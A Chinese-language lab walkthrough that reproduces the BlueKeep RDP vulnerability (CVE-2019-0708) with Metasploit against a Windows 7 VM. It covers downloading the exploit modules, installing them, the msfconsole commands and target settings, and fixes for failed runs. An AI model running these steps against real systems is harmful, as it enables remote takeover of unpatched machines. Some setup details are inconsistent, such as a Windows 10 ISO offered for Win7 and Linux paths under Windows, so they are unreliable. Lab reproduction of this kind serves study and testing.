0x01  

9月7号凌晨，MSF更新了CVE-2019-0708漏洞利用模块，在Metasploit下使用，使用便捷。但根据官方显示，该模块仅针对64位的Win7系统和Windows Server 2008 R2，但对于Windows Server 2008 R2也有特定的条件，具体如下：

0x02

靶机是使用MSDN下载的win7的系统

漏洞环境
使用VM安装Windows7模拟受害机
Windows7 SP1下载链接:

Windows 10 (Multiple Editions) (x64) - DVD (Chinese-Simplified) 详细信息

• 文件名

• cn_windows_10_multiple_editions_x64_dvd_6848463.iso

• SHA1

• C71D49A6144772F352806201EF564951BE55EDD5

• 文件大小

• 4.01GB

• 发布时间

• 2015-07-29

ed2k://|file|cn_windows_10_multiple_editions_x64_dvd_6848463.iso|4303300608|94FD861E82458005A9CA8E617379856A|/

如果用上面的系统，vm虚拟机安装的时候默认是家庭版的，所以在安装的时候要选择一下。

安装好如下：

0708漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。所以3389端口当然要打开啦。

靶机工作完成。

0x03

攻击机我用的是kali里面的msf，路径也是原生安装的位置。如果有安装位置有改动，需要注意下。

find / -name 'metasploit'

首先，需要下载该攻击套件

这边我使用wget下载：

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

查看一下

然后将攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

直接复制到对应的路径。

如果这里没有rdp目录，就用mkdir命令创建一个rdp目录。

Kali系统

rdp.rb   ->   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

rdp_scanner.rb   ->   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb   ->   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb   ->   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

命令如下

cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

sudo mkdir /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

sudo cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

sudo cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

sudo cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

mac电脑

rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

命令如下

sudo cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

sudo mkdir /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

sudo cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

sudo cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

sudo cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

windows电脑

rdp.rb   ->   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

rdp_scanner.rb   ->   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb   ->   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

mkdir /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cve_2019_0708_bluekeep_rce.rb   ->   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

放置OK后，启动msf

重新加载一下利用模块

reload_all

查找一下CVE-2019-0708这个模块

search cve-2019-0708

使用这个攻击模块，并查看一下帮助。

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

show options

可见关键设置主要为RHOSTS\ RPORT \ target

使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置靶机机器架构
这里我们使用的是VMware Fusion,那么target 3满足条件
使用exploit开始攻击,等待建立连接

0x4

攻击开始

这边总结下所用的命令（除去放置攻击套件的部分）

msfconsole                                            //启动msf
reload_all                                            //重新加载模块
search cve-2019-0708                                  //查找下cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce    //使用这个模块
set rhosts 192.168.80.129                             //设置靶机ip
set rport 3389                                        //改了端口的就必须设置，默认的3389可以忽略
set target 3                                          //设置靶机架构
run                                                   //开始（用exploit也可以，个人习惯用run）

完成攻击，成功拿到受害者主机权限。

0x05

另外填一下坑，分析一下大部分失败的原因。

这种情况是 rdp.rb 和 rdp_scanner.rb 文件没覆盖好，重新执行一下以下命令。 上文也有贴此命令。

cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

sudo mkdir /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

sudo cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

sudo cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

sudo cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

这种情况应该是把靶机打蓝屏了。

这种情况是网络都ping不通，或者3389端口没打开。

在确认系统是win7sp1，3389端口开启，能ping的通，且文件覆盖成功，target0-4都试了遍，重启系统多次，要是还是没法成功，把配置设置成2核2g再试试。